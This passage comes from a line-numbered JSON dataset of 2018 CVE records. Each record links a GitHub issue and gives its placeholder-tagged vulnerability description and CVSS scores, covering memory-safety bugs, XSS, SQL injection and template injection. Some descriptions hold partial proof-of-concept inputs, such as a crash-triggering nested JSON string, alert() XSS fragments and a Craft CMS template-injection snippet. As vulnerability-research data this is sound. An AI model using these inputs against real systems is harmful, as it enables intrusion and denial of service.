  29869. "description": "EVM dynamic array maybe occupy large memory. System information Geth version: APITAG OS & Version: Linux Commit hash : no found Expected behaviour Dynamic array save itself length in memory and this length will restrict index of array . ERRORTAG See the assambly , APITAG implicate index of array check . ERRORTAG So call function a like this APITAG , APITAG will success execute ;but APITAG , APITAG will except. Actual behaviour We know Solc will auto insert array index check code in assambly ,so I try still rewrite the dynamic length . ERRORTAG Unfortunately ,it can't pass compile .It mean we rewrite the length of dynamic array APITAG I try to rewrite the array length on memory that is work . ERRORTAG Lastly ,I try writing a data to offset APITAG in array .EVM will occupy large memory NUMBERTAG MB) ERRORTAG Steps to reproduce the behaviour This is EVM test command (ignore gas limit ): ./evm code APITAG input APITAG gas NUMBERTAG debug run FILETAG FILETAG Backtrace Not found ,you can see large memory alloc output on console by debug flag .",
  29870. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  29871. "severity": "HIGH",
  29872. "baseScore": 7.5,
  29873. "impactScore": 3.6,
  29874. "exploitabilityScore": 3.9
  29875. },
  29876. {
  29877. "CVE_ID": "CVE-2018-20425",
  29878. "Issue_Url_old": "https://github.com/libming/libming/issues/163",
  29879. "Issue_Url_new": "https://github.com/libming/libming/issues/163",
  29880. "Repo_new": "libming/libming",
  29881. "Issue_Created_At": "2018-09-21T09:02:41Z",
  29882. "description": "Null pointer dereference in pushdup (decompile.c NUMBERTAG A null pointer dereference bug was found in function APITAG CODETAG CODETAG to reproduce it ,run swftopython with APITAG APITAG credit: APITAG of Venustech FILETAG",
  29883. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  29884. "severity": "HIGH",
  29885. "baseScore": 8.8,
  29886. "impactScore": 5.9,
  29887. "exploitabilityScore": 2.8
  29888. },
  29889. {
  29890. "CVE_ID": "CVE-2018-20427",
  29891. "Issue_Url_old": "https://github.com/libming/libming/issues/164",
  29892. "Issue_Url_new": "https://github.com/libming/libming/issues/164",
  29893. "Repo_new": "libming/libming",
  29894. "Issue_Created_At": "2018-09-21T09:12:00Z",
  29895. "description": "Null pointer dereference in APITAG (decompile.c NUMBERTAG A null pointer dereference bug was found in function APITAG (decompile.c NUMBERTAG This is not the same issue with NUMBERTAG ERRORTAG to reproduce it ,run swftopython with APITAG APITAG credit: APITAG of Venustech FILETAG",
  29896. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  29897. "severity": "HIGH",
  29898. "baseScore": 8.8,
  29899. "impactScore": 5.9,
  29900. "exploitabilityScore": 2.8
  29901. },
  29902. {
  29903. "CVE_ID": "CVE-2018-20448",
  29904. "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/20",
  29905. "Issue_Url_new": "https://github.com/philippe/frogcms/issues/20",
  29906. "Repo_new": "philippe/frogcms",
  29907. "Issue_Created_At": "2018-12-18T13:31:22Z",
  29908. "description": "The parameter under FILETAG is that the Database name has reflective XSS. The parameter under FILETAG is that the Database name has reflective XSS NUMBERTAG The Database name , username and password must be correct NUMBERTAG You can use the exp APITAG alert NUMBERTAG APITAG FILETAG NUMBERTAG Success FILETAG",
  29909. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  29910. "severity": "MEDIUM",
  29911. "baseScore": 5.4,
  29912. "impactScore": 2.7,
  29913. "exploitabilityScore": 2.3
  29914. },
  29915. {
  29916. "CVE_ID": "CVE-2018-20450",
  29917. "Issue_Url_old": "https://github.com/evanmiller/libxls/issues/34",
  29918. "Issue_Url_new": "https://github.com/libxls/libxls/issues/34",
  29919. "Repo_new": "libxls/libxls",
  29920. "Issue_Created_At": "2018-12-23T15:01:22Z",
  29921. "description": "Double Free vulneribility in read_MSAT function. Test Version dev version, git clone URLTAG Test Program APITAG Gdb and Backtrace ERRORTAG POC file FILETAG CREDIT Zhao Liang, Huawei Weiran Labs",
  29922. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29923. "severity": "MEDIUM",
  29924. "baseScore": 6.5,
  29925. "impactScore": 3.6,
  29926. "exploitabilityScore": 2.8
  29927. },
  29928. {
  29929. "CVE_ID": "CVE-2018-20451",
  29930. "Issue_Url_old": "https://github.com/uvoteam/libdoc/issues/2",
  29931. "Issue_Url_new": "https://github.com/uvoteam/libdoc/issues/2",
  29932. "Repo_new": "uvoteam/libdoc",
  29933. "Issue_Created_At": "2018-12-25T06:51:08Z",
  29934. "description": "A heap buffer overflow in APITAG process_file. Test Version latest version, git clone URLTAG Environment Ubuntu NUMBERTAG gcc version NUMBERTAG Test Program and command APITAG APITAG Gdb and Backtrace ERRORTAG Asan Debug Information ERRORTAG POC file FILETAG CREDIT Zhao Liang, Huawei Weiran Labs",
  29935. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29936. "severity": "MEDIUM",
  29937. "baseScore": 6.5,
  29938. "impactScore": 3.6,
  29939. "exploitabilityScore": 2.8
  29940. },
  29941. {
  29942. "CVE_ID": "CVE-2018-20453",
  29943. "Issue_Url_old": "https://github.com/uvoteam/libdoc/issues/1",
  29944. "Issue_Url_new": "https://github.com/uvoteam/libdoc/issues/1",
  29945. "Repo_new": "uvoteam/libdoc",
  29946. "Issue_Created_At": "2018-12-24T15:41:59Z",
  29947. "description": "There is a heap buffer overflow on APITAG getlong. Test Version latest version, git clone URLTAG Environment Ubuntu NUMBERTAG gcc version NUMBERTAG Test Program and command APITAG APITAG Gdb and Backtrace ERRORTAG Asan Debug Information ERRORTAG POC file FILETAG CREDIT Zhao Liang, Huawei Weiran Labs",
  29948. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29949. "severity": "MEDIUM",
  29950. "baseScore": 6.5,
  29951. "impactScore": 3.6,
  29952. "exploitabilityScore": 2.8
  29953. },
  29954. {
  29955. "CVE_ID": "CVE-2018-20454",
  29956. "Issue_Url_old": "https://github.com/coolboy0816/audit/issues/1",
  29957. "Issue_Url_new": "https://github.com/coolboy0816/audit/issues/1",
  29958. "Repo_new": "coolboy0816/audit",
  29959. "Issue_Created_At": "2018-12-25T02:13:26Z",
  29960. "description": "APITAG XSS. Reflective XSS exists in search box APITAG JS can be injected into the page by APITAG twice encoding. The vulnerability involved is the parameter key in get reques.",
  29961. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  29962. "severity": "MEDIUM",
  29963. "baseScore": 6.1,
  29964. "impactScore": 2.7,
  29965. "exploitabilityScore": 2.8
  29966. },
  29967. {
  29968. "CVE_ID": "CVE-2018-20456",
  29969. "Issue_Url_old": "https://github.com/radare/radare2/issues/12372",
  29970. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/12372",
  29971. "Repo_new": "radareorg/radare2",
  29972. "Issue_Created_At": "2018-12-02T14:46:54Z",
  29973. "description": "APITAG stack buffer overflow at PATHTAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | | Architecture/bits of the file (mandatory) | | r2 v full output, not truncated (mandatory) | rasm NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG a0cfcdd commit: APITAG build NUMBERTAG Expected behavior rasm2 exits with error message. Actual behavior rasm2 crashes ERRORTAG Steps to reproduce the behavior run APITAG where $STRING is one of the followings: APITAG",
  29974. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29975. "severity": "MEDIUM",
  29976. "baseScore": 5.5,
  29977. "impactScore": 3.6,
  29978. "exploitabilityScore": 1.8
  29979. },
  29980. {
  29981. "CVE_ID": "CVE-2018-20457",
  29982. "Issue_Url_old": "https://github.com/radare/radare2/issues/12417",
  29983. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/12417",
  29984. "Repo_new": "radareorg/radare2",
  29985. "Issue_Created_At": "2018-12-05T16:07:28Z",
  29986. "description": "APITAG heap buffer overflow (OOB read) at PATHTAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | | Architecture/bits of the file (mandatory) | | r2 v full output, not truncated (mandatory) | rasm NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG f2e NUMBERTAG c3 commit: APITAG build NUMBERTAG Expected behavior rasm2 exits with error message. Actual behavior rasm2 crashes. ERRORTAG Steps to reproduce the behavior Compile radare2 with asan (tried O3/ O0) run APITAG NUMBERTAG asr' etc).",
  29987. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29988. "severity": "MEDIUM",
  29989. "baseScore": 5.5,
  29990. "impactScore": 3.6,
  29991. "exploitabilityScore": 1.8
  29992. },
  29993. {
  29994. "CVE_ID": "CVE-2018-20458",
  29995. "Issue_Url_old": "https://github.com/radare/radare2/issues/12374",
  29996. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/12374",
  29997. "Repo_new": "radareorg/radare2",
  29998. "Issue_Created_At": "2018-12-02T15:37:07Z",
  29999. "description": "APITAG heap buffer overflow at PATHTAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | | Architecture/bits of the file (mandatory) | | r2 v full output, not truncated (mandatory) | rabin NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG a0cfcdd commit: APITAG build NUMBERTAG Expected behavior rabin2 shows binary property or exits abnormally Actual behavior rabin2 crashes ERRORTAG Steps to reproduce the behavior run APITAG FILETAG",
  30000. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30001. "severity": "MEDIUM",
  30002. "baseScore": 5.5,
  30003. "impactScore": 3.6,
  30004. "exploitabilityScore": 1.8
  30005. },
  30006. {
  30007. "CVE_ID": "CVE-2018-20460",
  30008. "Issue_Url_old": "https://github.com/radare/radare2/issues/12376",
  30009. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/12376",
  30010. "Repo_new": "radareorg/radare2",
  30011. "Issue_Created_At": "2018-12-02T16:43:25Z",
  30012. "description": "APITAG stack buffer overflow at PATHTAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | | Architecture/bits of the file (mandatory) | | r2 v full output, not truncated (mandatory) | rasm NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG a0cfcdd commit: APITAG build NUMBERTAG Expected behavior rasm2 exits with error messages Actual behavior rasm2 crashes ERRORTAG Steps to reproduce the behavior run APITAG Additional Logs, screenshots, source code, configuration dump, ... We also find another file generates from r2's APITAG results that also emits such an error when running APITAG .",
  30013. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30014. "severity": "MEDIUM",
  30015. "baseScore": 5.5,
  30016. "impactScore": 3.6,
  30017. "exploitabilityScore": 1.8
  30018. },
  30019. {
  30020. "CVE_ID": "CVE-2018-20461",
  30021. "Issue_Url_old": "https://github.com/radare/radare2/issues/12375",
  30022. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/12375",
  30023. "Repo_new": "radareorg/radare2",
  30024. "Issue_Created_At": "2018-12-02T16:19:33Z",
  30025. "description": "APITAG heap buffer overflow at PATHTAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | ELF | Architecture/bits of the file (mandatory) | arm/arm NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG a0cfcdd commit: APITAG build NUMBERTAG Expected behavior r2 works normally Actual behavior r2 crashes Steps to reproduce the behavior run APITAG and get into the REPL run bd run ao ERRORTAG FILETAG Additional Logs, screenshots, source code, configuration dump, ... The root cause seems to be bd . For other arch binaries such as NUMBERTAG mips, ppc, it also works wrongly when bd is invoked firstly (below is a test against APITAG on Ubuntu NUMBERTAG FILETAG",
  30026. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30027. "severity": "MEDIUM",
  30028. "baseScore": 5.5,
  30029. "impactScore": 3.6,
  30030. "exploitabilityScore": 1.8
  30031. },
  30032. {
  30033. "CVE_ID": "CVE-2018-20465",
  30034. "Issue_Url_old": "https://github.com/phuctam/Server-Side-Template-Injection-in-CraftCMS-/issues/1",
  30035. "Issue_Url_new": "https://github.com/phuctam/server-side-template-injection-in-craftcms-/issues/1",
  30036. "Repo_new": "phuctam/server-side-template-injection-in-craftcms-",
  30037. "Issue_Created_At": "2018-12-10T09:52:43Z",
  30038. "description": "Server Side Template Injection in APITAG Version: Craft CMS NUMBERTAG Authentication: Admin right Reproduce steps: Step1: Access Category group creation function and create new category group as shown below: {% set user = APITAG set password = APITAG user }} | {{ password }} FILETAG Step2: Access menu APITAG create new Category in the new category created above FILETAG",
  30039. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  30040. "severity": "HIGH",
  30041. "baseScore": 7.2,
  30042. "impactScore": 5.9,
  30043. "exploitabilityScore": 1.2
  30044. },
  30045. {
  30046. "CVE_ID": "CVE-2018-20467",
  30047. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1408",
  30048. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1408",
  30049. "Repo_new": "imagemagick/imagemagick",
  30050. "Issue_Created_At": "2018-12-06T11:07:56Z",
  30051. "description": "convert hang until NUMBERTAG CPU NUMBERTAG mem. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG I found a problem that will cause the program hang, and the CPU and memory will be exhausted. If limit memory, it will crash. Steps to Reproduce APITAG APITAG APITAG ulimit S NUMBERTAG it crash. System Configuration APITAG APITAG version: APITAG NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG LTS Additional information: git commit APITAG APITAG",
  30052. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30053. "severity": "MEDIUM",
  30054. "baseScore": 6.5,
  30055. "impactScore": 3.6,
  30056. "exploitabilityScore": 2.8
  30057. },
  30058. {
  30059. "CVE_ID": "CVE-2018-20486",
  30060. "Issue_Url_old": "https://github.com/Ppsoft1990/Metinfo6.1.3/issues/2",
  30061. "Issue_Url_new": "https://github.com/ppsoft1990/metinfo6.1.3/issues/2",
  30062. "Repo_new": "ppsoft1990/metinfo6.1.3",
  30063. "Issue_Created_At": "2018-12-26T09:49:23Z",
  30064. "description": "Stored XSS Vulnerability exists in the all versions of Metinfo NUMBERTAG Stored XSS Vulnerability exists in the all versions of Metinfo APITAG can be executed javascript code. Metinfo NUMBERTAG allows XSS via the PATHTAG url_array parameter. Metinfo official website: FILETAG Metinfo NUMBERTAG source code download page URLTAG FILETAG View the doc: FILETAG",
  30065. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  30066. "severity": "MEDIUM",
  30067. "baseScore": 6.1,
  30068. "impactScore": 2.7,
  30069. "exploitabilityScore": 2.8
  30070. },
  30071. {
  30072. "CVE_ID": "CVE-2018-20502",
  30073. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/349",
  30074. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/349",
  30075. "Repo_new": "axiomatic-systems/bento4",
  30076. "Issue_Created_At": "2018-12-26T06:58:51Z",
  30077. "description": "Allocate for large amounts of memory failed in APITAG at Bento NUMBERTAG when running mp NUMBERTAG hls. A crafted input will lead to Memory allocation failed in APITAG at Bento NUMBERTAG Triggered by ./mp NUMBERTAG hls crash6.mp4 Poc FILETAG Bento4 Version NUMBERTAG The ASAN information is as follows: ERRORTAG APITAG EMAILTAG",
  30078. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30079. "severity": "MEDIUM",
  30080. "baseScore": 6.5,
  30081. "impactScore": 3.6,
  30082. "exploitabilityScore": 2.8
  30083. },
  30084. {
  30085. "CVE_ID": "CVE-2018-20519",
  30086. "Issue_Url_old": "https://github.com/coolboy0816/audit/issues/2",
  30087. "Issue_Url_new": "https://github.com/coolboy0816/audit/issues/2",
  30088. "Repo_new": "coolboy0816/audit",
  30089. "Issue_Created_At": "2018-12-26T08:05:15Z",
  30090. "description": "APITAG ultra vires. First, register a user, create a resume, and then modify the job search intention, which can lead to the modification of any person and disclosure of personal information. Vulnerability proof\uff1a FILETAG",
  30091. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  30092. "severity": "HIGH",
  30093. "baseScore": 8.1,
  30094. "impactScore": 5.2,
  30095. "exploitabilityScore": 2.8
  30096. },
  30097. {
  30098. "CVE_ID": "CVE-2018-20520",
  30099. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/27",
  30100. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/27",
  30101. "Repo_new": "bg5sbk/minicms",
  30102. "Issue_Created_At": "2018-12-14T14:07:55Z",
  30103. "description": "APITAG reflective XSS in PATHTAG This is a reflective XSS vulnerability because \"echo $_SERVER FILETAG In Firefox and chrome, URL will be APITAG In IE, if has Redirection\uff0cURL will not be APITAG After logging in, XSS is triggered using exp Exp: URLTAG \"> APITAG alert(\"dudu\") APITAG Result: FILETAG",
  30104. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  30105. "severity": "MEDIUM",
  30106. "baseScore": 6.1,
  30107. "impactScore": 2.7,
  30108. "exploitabilityScore": 2.8
  30109. },
  30110. {
  30111. "CVE_ID": "CVE-2018-20541",
  30112. "Issue_Url_old": "https://github.com/hfp/libxsmm/issues/287",
  30113. "Issue_Url_new": "https://github.com/libxsmm/libxsmm/issues/287",
  30114. "Repo_new": "libxsmm/libxsmm",
  30115. "Issue_Created_At": "2018-11-26T10:50:55Z",
  30116. "description": "reported buffer overflows. The following reports of asan errors in the generator were made in the Fedora tracker, but apparently against development source, not a version in Fedora, and it's not clear exactly how they're obtained. You may want to take a look anyhow. I haven't examined them other than to verify they don't match the NUMBERTAG source which is currently in Fedora. (I'll update the packaging to NUMBERTAG now I know about it; Fedora release notification is broken, unfortunately.) CVETAG CVETAG CVETAG",
  30117. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  30118. "severity": "HIGH",
  30119. "baseScore": 8.8,
  30120. "impactScore": 5.9,
  30121. "exploitabilityScore": 2.8
  30122. },
  30123. {
  30124. "CVE_ID": "CVE-2018-20552",
  30125. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/530",
  30126. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/530",
  30127. "Repo_new": "appneta/tcpreplay",
  30128. "Issue_Created_At": "2018-12-19T06:02:42Z",
  30129. "description": "APITAG NUMBERTAG heap buffer overflow problems APITAG && APITAG Both tested in Ubuntu NUMBERTAG bit, gcc NUMBERTAG tcpreplay (master NUMBERTAG d NUMBERTAG And APITAG returns ERRORTAG Triggered by APITAG POC1 poc file: URLTAG ASAN info: ERRORTAG POC2 poc file: URLTAG ASAN info: ERRORTAG",
  30130. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  30131. "severity": "HIGH",
  30132. "baseScore": 7.8,
  30133. "impactScore": 5.9,
  30134. "exploitabilityScore": 1.8
  30135. },
  30136. {
  30137. "CVE_ID": "CVE-2018-20571",
  30138. "Issue_Url_old": "https://github.com/AutismJH/damicms/issues/1",
  30139. "Issue_Url_new": "https://github.com/autismjh/damicms/issues/1",
  30140. "Repo_new": "autismjh/damicms",
  30141. "Issue_Created_At": "2018-12-28T08:37:38Z",
  30142. "description": "Arbitrary file read vulnerability . Read the global configuration file content by constructing a URL. FILETAG FILETAG",
  30143. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  30144. "severity": "HIGH",
  30145. "baseScore": 7.5,
  30146. "impactScore": 3.6,
  30147. "exploitabilityScore": 3.9
  30148. },
  30149. {
  30150. "CVE_ID": "CVE-2018-20572",
  30151. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/166",
  30152. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/166",
  30153. "Repo_new": "wuzhicms/wuzhicms",
  30154. "Issue_Created_At": "2018-12-28T09:01:05Z",
  30155. "description": "wuzhicms NUMBERTAG PATHTAG sql injection vulnerability. Vulnerability file: PATHTAG public\u00a0function\u00a0 APITAG \u00a0{\u00a0\u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0$siteid\u00a0=\u00a0get_cookie('siteid');\u00a0\u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0$page\u00a0=\u00a0isset($GLOBALS FILETAG APITAG NUMBERTAG",
  30156. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  30157. "severity": "CRITICAL",
  30158. "baseScore": 9.8,
  30159. "impactScore": 5.9,
  30160. "exploitabilityScore": 3.9
  30161. },
  30162. {
  30163. "CVE_ID": "CVE-2018-20573",
  30164. "Issue_Url_old": "https://github.com/jbeder/yaml-cpp/issues/655",
  30165. "Issue_Url_new": "https://github.com/jbeder/yaml-cpp/issues/655",
  30166. "Repo_new": "jbeder/yaml-cpp",
  30167. "Issue_Created_At": "2018-12-28T08:13:29Z",
  30168. "description": "Stack Overflow in APITAG . Stack Overflow in APITAG position\uff1a code URLTAG FILETAG To reproduce: APITAG gdb: Program received signal SIGSEGV, Segmentation fault. APITAG ASAN: APITAG ERRORTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  30169. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30170. "severity": "MEDIUM",
  30171. "baseScore": 6.5,
  30172. "impactScore": 3.6,
  30173. "exploitabilityScore": 2.8
  30174. },
  30175. {
  30176. "CVE_ID": "CVE-2018-20574",
  30177. "Issue_Url_old": "https://github.com/jbeder/yaml-cpp/issues/654",
  30178. "Issue_Url_new": "https://github.com/jbeder/yaml-cpp/issues/654",
  30179. "Repo_new": "jbeder/yaml-cpp",
  30180. "Issue_Created_At": "2018-12-28T07:51:02Z",
  30181. "description": "Stack Overflow in APITAG Stack Overflow in APITAG position\uff1a code URLTAG FILETAG To reproduce: APITAG gdb: Program received signal SIGSEGV, Segmentation fault. APITAG ASAN: APITAG ERRORTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  30182. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30183. "severity": "MEDIUM",
  30184. "baseScore": 6.5,
  30185. "impactScore": 3.6,
  30186. "exploitabilityScore": 2.8
  30187. },
  30188. {
  30189. "CVE_ID": "CVE-2018-20579",
  30190. "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/601",
  30191. "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/601",
  30192. "Repo_new": "contiki-ng/contiki-ng",
  30193. "Issue_Created_At": "2018-07-11T12:51:10Z",
  30194. "description": "Stack based buffer overflow while parsing JSON file. Function APITAG that implements stack push operation does not check whether new elements are still within allocated buffer. It returns error only before ending the function, but this value is never checked in JSON parser, so the next push operations are not blocked. PATHTAG define JSONPARSE_MAX_DEPTH NUMBERTAG Declaration of the buffer: PATHTAG struct jsonparse_state { ... char stack[JSONPARSE_MAX_DEPTH]; }; Function APITAG PATHTAG static int push(struct jsonparse_state state, char c) { state >stack[state >depth] = c; state >depth++; state >vtype NUMBERTAG return state >depth APITAG json[state >pos]; s = jsonparse_get_type(state); v = state >vtype; state >pos++; switch(c) { case '{': if((s NUMBERTAG s == '[' || s == ':') { push(state, c); Vulnerability is not likely to be used for Remote Code Execution exploit, because it allows to only put two types of characters to this stack: left curly bracket ({), left square bracket ([), so the risk was reduced APITAG None, Integrity: Low, Scope: Unchanged). However it is quite easy to overwrite the function return address on stack or stack canary, which leads to crash of the application (via segmentation fault) and can be used by attacker for Denial of Service attacks. Additionally, the risk of this issue is also reduced APITAG APITAG because attacker would need to parse malicious JSON, however it is quite possible when using JSON input data in APITAG application. Proposed CVSS score: PATHTAG NUMBERTAG Medium) Following JSON will trigger crash: {\"a\": { \"a\": { \"a\": { \"a\": { \"a\": { \"a\": { \"a\": { \"a\": { \"a\": { \"a\": { \"a\": { \"a\": { or using square brackets: {\"a\": APITAG Mitigation : Function APITAG should not allow to add new elements to the stack after reaching the limit (JSONPARSE_MAX_DEPTH). Functions using the APITAG function should check the returned value. Crash details using Address Sanitizer NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffd NUMBERTAG c1c NUMBERTAG at pc NUMBERTAG ERRORTAG NUMBERTAG f1 bp NUMBERTAG ffd NUMBERTAG c1c5a0 sp NUMBERTAG ffd NUMBERTAG c1c NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG ffd NUMBERTAG c1c NUMBERTAG thread T NUMBERTAG ERRORTAG NUMBERTAG f0 in push PATHTAG NUMBERTAG ERRORTAG NUMBERTAG f0 in jsonparse_next PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG d NUMBERTAG in _start ( PATHTAG ) Address NUMBERTAG ffd NUMBERTAG c1c NUMBERTAG is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG af in main PATHTAG This frame has NUMBERTAG object(s NUMBERTAG state' APITAG NUMBERTAG b8c0: f1 f1 f1 f NUMBERTAG f4]f4 f4 f3 f3 f3 f NUMBERTAG b8d NUMBERTAG b8e NUMBERTAG b8f NUMBERTAG b NUMBERTAG b NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
  30195. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  30196. "severity": "HIGH",
  30197. "baseScore": 7.1,
  30198. "impactScore": 5.2,
  30199. "exploitabilityScore": 1.8
  30200. },
  30201. {
  30202. "CVE_ID": "CVE-2018-20583",
  30203. "Issue_Url_old": "https://github.com/thephpleague/commonmark/issues/337",
  30204. "Issue_Url_new": "https://github.com/thephpleague/commonmark/issues/337",
  30205. "Repo_new": "thephpleague/commonmark",
  30206. "Issue_Created_At": "2018-12-30T01:47:42Z",
  30207. "description": "XSS Vulnerability NUMBERTAG An XSS vulnerability has been reported in this library. We're opening this issue so we have a place to provide further details once the fix is available. No action is required at this time.",
  30208. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  30209. "severity": "MEDIUM",
  30210. "baseScore": 6.1,
  30211. "impactScore": 2.7,
  30212. "exploitabilityScore": 2.8
  30213. },
  30214. {
  30215. "CVE_ID": "CVE-2018-20584",
  30216. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/192",
  30217. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/192",
  30218. "Repo_new": "jasper-software/jasper",
  30219. "Issue_Created_At": "2018-12-29T05:40:28Z",
  30220. "description": "hang in jasper. when jasper converted output format jp2,it hanged. ./jasper input APITAG output /dev/null output format jp2 FILETAG",
  30221. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30222. "severity": "MEDIUM",
  30223. "baseScore": 6.5,
  30224. "impactScore": 3.6,
  30225. "exploitabilityScore": 2.8
  30226. },
  30227. {
  30228. "CVE_ID": "CVE-2018-20588",
  30229. "Issue_Url_old": "https://github.com/caryll/otfcc/issues/59",
  30230. "Issue_Url_new": "https://github.com/caryll/otfcc/issues/59",
  30231. "Repo_new": "caryll/otfcc",
  30232. "Issue_Created_At": "2018-12-30T08:37:39Z",
  30233. "description": "global buffer overflow in PATHTAG Test Version dev version, git clone FILETAG Test Program PATHTAG [infile] Asan Debug Information ERRORTAG POC file APITAG",
  30234. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30235. "severity": "MEDIUM",
  30236. "baseScore": 6.5,
  30237. "impactScore": 3.6,
  30238. "exploitabilityScore": 2.8
  30239. },
  30240. {
  30241. "CVE_ID": "CVE-2018-20591",
  30242. "Issue_Url_old": "https://github.com/libming/libming/issues/168",
  30243. "Issue_Url_new": "https://github.com/libming/libming/issues/168",
  30244. "Repo_new": "libming/libming",
  30245. "Issue_Created_At": "2018-12-20T07:03:46Z",
